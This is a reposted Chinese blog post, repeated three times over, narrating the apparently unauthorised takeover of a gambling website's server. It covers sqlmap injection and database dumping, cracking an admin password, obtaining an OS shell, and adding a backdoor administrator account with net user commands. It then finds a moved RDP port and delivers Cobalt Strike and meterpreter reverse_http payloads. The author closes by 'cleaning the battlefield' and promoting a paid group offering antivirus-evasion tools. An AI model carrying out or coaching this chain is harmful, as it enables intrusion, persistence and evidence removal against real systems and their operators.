日常拿下“打牌”网站服务器

admin 2023年3月17日12:26:50日常拿下“打牌”网站服务器已关闭评论33 views字数 5920阅读19分44秒阅读模式

声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,鹏组安全及文章作者不为此承担任何责任。

图片


现在只对常读和星标的公众号才展示大图推送,建议大家能把鹏组安全设为星标”,否则可能就看不到了啦

话不多说 直接开始打牌

找到后台页面日常拿下“打牌”网站服务器抓个登陆包日常拿下“打牌”网站服务器丢到sqlmap里面去跑跑,成功拿到数据库日常拿下“打牌”网站服务器这里找了一下终于在RYPlatforManagerDB里面找到了账户信息
密码是加密的,用自带的解密工具得出了顶级弱口令admin-admin日常拿下“打牌”网站服务器成功进入后台日常拿下“打牌”网站服务器乱点一通,没发现啥啥比较容易利用的,重新回到sqlmap
用–is-dba参数判断得出当前用户为DBA日常拿下“打牌”网站服务器接下来就使用–os-shell参数试试能不能拿到shell,经过漫长等待最终成功了日常拿下“打牌”网站服务器whoami发现令人惊喜一幕日常拿下“打牌”网站服务器这还能说啥,直接上命令了
net user test QWer1234! /add
net localgroup administrators test /add日常拿下“打牌”网站服务器日常拿下“打牌”网站服务器接下来就尝试一波RDP连接,不出意外失败了日常拿下“打牌”网站服务器思考了一下原因,决定从RDP这个服务本身开始进行排错
首先确认一下RDP这个服务是不是开着的,不管了直接用net start termservice的命令,反正最终也要打开这个服务日常拿下“打牌”网站服务器服务是开着的,那么可能性就多了,这时最怕遇到的就是管理员开了白名单,那就白忙活一场
既然都到这了肯定不能放弃,就先从最简单的点进行排错
由于sqlmap的回显是出奇的慢,得想个办法,在得到想要的结果的同时尽可能去缩减回显的内容,这样就可以加快回显的速度,提高效率。经过一番百度,终得出这样的思路:既然服务开启,那么就会有对应的进程,RDP的服务对应的进程名称是svchost.exe,描述是termservice,那么可以查看带有termservice描述的svchost.exe进程去拿到进程PID,然后通过PID去获取服务的端口号,同时加上管道符 | 还能减少回显内容
尝试之后得到以下命令
tasklist /svc | findstr termservice
netstat -ano | findstr 进程号

这里出了点问题,回显竟然没有任何内容日常拿下“打牌”网站服务器理论上来说,肯定是有回显才对。经过一番挣扎,发现忽略了一个细节!不能用termservice而是要用TermService,竟然忘记区分大小写了!重新来过,成功拿到了进程PID 1908日常拿下“打牌”网站服务器有了PID,就可以反查端口日常拿下“打牌”网站服务器还好,管理员只是改了端口,并没有开启白名单,有了端口就可以用之前创建的账号进行连接了日常拿下“打牌”网站服务器看到这个弹窗,就知道有机可乘了
GET!图片补丁倒是不少图片

还没有结束

本着不浪费的原则,还是cs上线一波,不然就白白浪费调试cs服务器的时间了
用cs客户端先建立listener,日常拿下“打牌”网站服务器然后选择Attacks->Web Drive-by->Scripted Web Delivery(s),host就写服务器地址,端口随便写,listener就选择刚刚创建的监听,可以得到一条让目标上线的payload日常拿下“打牌”网站服务器用shell去执行这个payload,过一会就能上线cs了日常拿下“打牌”网站服务器成功上线~至于为啥会上线这么多个,我也还在思考中,日常拿下“打牌”网站服务器右键目标,就可以使用很多种攻击方式了日常拿下“打牌”网站服务器因为菜,所以这是个裸的cs4.0,那么还是回到kali吧
用配置好的frp尝试把这个shell反弹到msf试试
这里需要在cs上重新建立一个新的listener图片然后进入msfconsle设置监听本地的1235端口

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lport 1235
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > run

因为我的1234被占用了我就换成了1235日常拿下“打牌”网站服务器到cs中右键目标->spawn
选之前建立的msf监听器就行了日常拿下“打牌”网站服务器不出意外的话,过十秒钟msf就能接受到服务器弹过来的shell,但是这里突然出现了一个状况,cs提示beacon exit , 之前sqlmap的os-shell也断了日常拿下“打牌”网站服务器日常拿下“打牌”网站服务器我怀疑是管理员上线了,被迫放弃。看来是天意,那就到此为止
总结一下,收获还不错
RDP回去清理了一下战场,收工走人
雕虫小技,大佬多多指点~

开始打牌

找到后台页面日常拿下“打牌”网站服务器抓个登陆包日常拿下“打牌”网站服务器丢到sqlmap里面去跑跑,成功拿到数据库日常拿下“打牌”网站服务器这里找了一下终于在RYPlatforManagerDB里面找到了账户信息
密码是加密的,用自带的解密工具得出了顶级弱口令admin-admin日常拿下“打牌”网站服务器成功进入后台日常拿下“打牌”网站服务器乱点一通,没发现啥啥比较容易利用的,重新回到sqlmap
用–is-dba参数判断得出当前用户为DBA日常拿下“打牌”网站服务器接下来就使用–os-shell参数试试能不能拿到shell,经过漫长等待最终成功了日常拿下“打牌”网站服务器whoami发现令人惊喜一幕日常拿下“打牌”网站服务器这还能说啥,直接上命令了
net user test QWer1234! /add
net localgroup administrators test /add日常拿下“打牌”网站服务器日常拿下“打牌”网站服务器接下来就尝试一波RDP连接,不出意外失败了日常拿下“打牌”网站服务器思考了一下原因,决定从RDP这个服务本身开始进行排错
首先确认一下RDP这个服务是不是开着的,不管了直接用net start termservice的命令,反正最终也要打开这个服务日常拿下“打牌”网站服务器服务是开着的,那么可能性就多了,这时最怕遇到的就是管理员开了白名单,那就白忙活一场
既然都到这了肯定不能放弃,就先从最简单的点进行排错
由于sqlmap的回显是出奇的慢,得想个办法,在得到想要的结果的同时尽可能去缩减回显的内容,这样就可以加快回显的速度,提高效率。经过一番百度,终得出这样的思路:既然服务开启,那么就会有对应的进程,RDP的服务对应的进程名称是svchost.exe,描述是termservice,那么可以查看带有termservice描述的svchost.exe进程去拿到进程PID,然后通过PID去获取服务的端口号,同时加上管道符 | 还能减少回显内容
尝试之后得到以下命令
tasklist /svc | findstr termservice
netstat -ano | findstr 进程号

这里出了点问题,回显竟然没有任何内容日常拿下“打牌”网站服务器理论上来说,肯定是有回显才对。经过一番挣扎,发现忽略了一个细节!不能用termservice而是要用TermService,竟然忘记区分大小写了!重新来过,成功拿到了进程PID 1908日常拿下“打牌”网站服务器有了PID,就可以反查端口日常拿下“打牌”网站服务器还好,管理员只是改了端口,并没有开启白名单,有了端口就可以用之前创建的账号进行连接了日常拿下“打牌”网站服务器看到这个弹窗,就知道有机可乘了
GET!图片补丁倒是不少图片

还没有结束

本着不浪费的原则,还是cs上线一波,不然就白白浪费调试cs服务器的时间了
用cs客户端先建立listener,日常拿下“打牌”网站服务器然后选择Attacks->Web Drive-by->Scripted Web Delivery(s),host就写服务器地址,端口随便写,listener就选择刚刚创建的监听,可以得到一条让目标上线的payload日常拿下“打牌”网站服务器用shell去执行这个payload,过一会就能上线cs了日常拿下“打牌”网站服务器成功上线~至于为啥会上线这么多个,我也还在思考中,日常拿下“打牌”网站服务器右键目标,就可以使用很多种攻击方式了日常拿下“打牌”网站服务器因为菜,所以这是个裸的cs4.0,那么还是回到kali吧
用配置好的frp尝试把这个shell反弹到msf试试
这里需要在cs上重新建立一个新的listener图片然后进入msfconsle设置监听本地的1235端口

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lport 1235
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > run

因为我的1234被占用了我就换成了1235日常拿下“打牌”网站服务器到cs中右键目标->spawn
选之前建立的msf监听器就行了日常拿下“打牌”网站服务器不出意外的话,过十秒钟msf就能接受到服务器弹过来的shell,但是这里突然出现了一个状况,cs提示beacon exit , 之前sqlmap的os-shell也断了日常拿下“打牌”网站服务器日常拿下“打牌”网站服务器我怀疑是管理员上线了,被迫放弃。看来是天意,那就到此为止
总结一下,收获还不错
RDP回去清理了一下战场,收工走人
雕虫小技,大佬多多指点~

https://blog.csdn.net/sjyyyyyyyy/article/details/109279656?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522167878051416800182185105%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=167878051416800182185105&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-21-109279656-null-null.142^v73^wechat_v2,201^v4^add_ask,239^v2^insert_chatgpt&utm_term=%E6%8B%BF%E4%B8%8B%E7%BD%91%E7%AB%99%E5%90%8E%E5%8F%B0&spm=1018.2226.3001.4187

开始打牌

找到后台页面日常拿下“打牌”网站服务器抓个登陆包日常拿下“打牌”网站服务器丢到sqlmap里面去跑跑,成功拿到数据库日常拿下“打牌”网站服务器这里找了一下终于在RYPlatforManagerDB里面找到了账户信息
密码是加密的,用自带的解密工具得出了顶级弱口令admin-admin日常拿下“打牌”网站服务器成功进入后台日常拿下“打牌”网站服务器乱点一通,没发现啥啥比较容易利用的,重新回到sqlmap
用–is-dba参数判断得出当前用户为DBA日常拿下“打牌”网站服务器接下来就使用–os-shell参数试试能不能拿到shell,经过漫长等待最终成功了日常拿下“打牌”网站服务器whoami发现令人惊喜一幕日常拿下“打牌”网站服务器这还能说啥,直接上命令了
net user test QWer1234! /add
net localgroup administrators test /add日常拿下“打牌”网站服务器日常拿下“打牌”网站服务器接下来就尝试一波RDP连接,不出意外失败了日常拿下“打牌”网站服务器思考了一下原因,决定从RDP这个服务本身开始进行排错
首先确认一下RDP这个服务是不是开着的,不管了直接用net start termservice的命令,反正最终也要打开这个服务日常拿下“打牌”网站服务器服务是开着的,那么可能性就多了,这时最怕遇到的就是管理员开了白名单,那就白忙活一场
既然都到这了肯定不能放弃,就先从最简单的点进行排错
由于sqlmap的回显是出奇的慢,得想个办法,在得到想要的结果的同时尽可能去缩减回显的内容,这样就可以加快回显的速度,提高效率。经过一番百度,终得出这样的思路:既然服务开启,那么就会有对应的进程,RDP的服务对应的进程名称是svchost.exe,描述是termservice,那么可以查看带有termservice描述的svchost.exe进程去拿到进程PID,然后通过PID去获取服务的端口号,同时加上管道符 | 还能减少回显内容
尝试之后得到以下命令
tasklist /svc | findstr termservice
netstat -ano | findstr 进程号

这里出了点问题,回显竟然没有任何内容日常拿下“打牌”网站服务器理论上来说,肯定是有回显才对。经过一番挣扎,发现忽略了一个细节!不能用termservice而是要用TermService,竟然忘记区分大小写了!重新来过,成功拿到了进程PID 1908日常拿下“打牌”网站服务器有了PID,就可以反查端口日常拿下“打牌”网站服务器还好,管理员只是改了端口,并没有开启白名单,有了端口就可以用之前创建的账号进行连接了日常拿下“打牌”网站服务器看到这个弹窗,就知道有机可乘了
GET!图片补丁倒是不少图片

还没有结束

本着不浪费的原则,还是cs上线一波,不然就白白浪费调试cs服务器的时间了
用cs客户端先建立listener,日常拿下“打牌”网站服务器然后选择Attacks->Web Drive-by->Scripted Web Delivery(s),host就写服务器地址,端口随便写,listener就选择刚刚创建的监听,可以得到一条让目标上线的payload日常拿下“打牌”网站服务器用shell去执行这个payload,过一会就能上线cs了日常拿下“打牌”网站服务器成功上线~至于为啥会上线这么多个,我也还在思考中,日常拿下“打牌”网站服务器右键目标,就可以使用很多种攻击方式了日常拿下“打牌”网站服务器因为菜,所以这是个裸的cs4.0,那么还是回到kali吧
用配置好的frp尝试把这个shell反弹到msf试试
这里需要在cs上重新建立一个新的listener图片然后进入msfconsle设置监听本地的1235端口

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lport 1235
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > run

因为我的1234被占用了我就换成了1235日常拿下“打牌”网站服务器到cs中右键目标->spawn
选之前建立的msf监听器就行了日常拿下“打牌”网站服务器不出意外的话,过十秒钟msf就能接受到服务器弹过来的shell,但是这里突然出现了一个状况,cs提示beacon exit , 之前sqlmap的os-shell也断了日常拿下“打牌”网站服务器日常拿下“打牌”网站服务器我怀疑是管理员上线了,被迫放弃。看来是天意,那就到此为止
总结一下,收获还不错
RDP回去清理了一下战场,收工走人
雕虫小技,大佬多多指点~

挖洞的时候,需要细心细心,再细心,因为一切往往都可能利用


文章来源:CSDN

原文链接:https://blog.csdn.net/sjyyyyyyyy/article/details/109279656






付费圈子


欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员


图片

进成员内部群


图片


图片

星球的最近主题和星球内部工具一些展示


图片

图片


图片


图片

图片

图片


图片

好文分享收藏赞一下最美点在看哦

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月17日12:26:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   日常拿下“打牌”网站服务器https://cn-sec.com/archives/1611037.html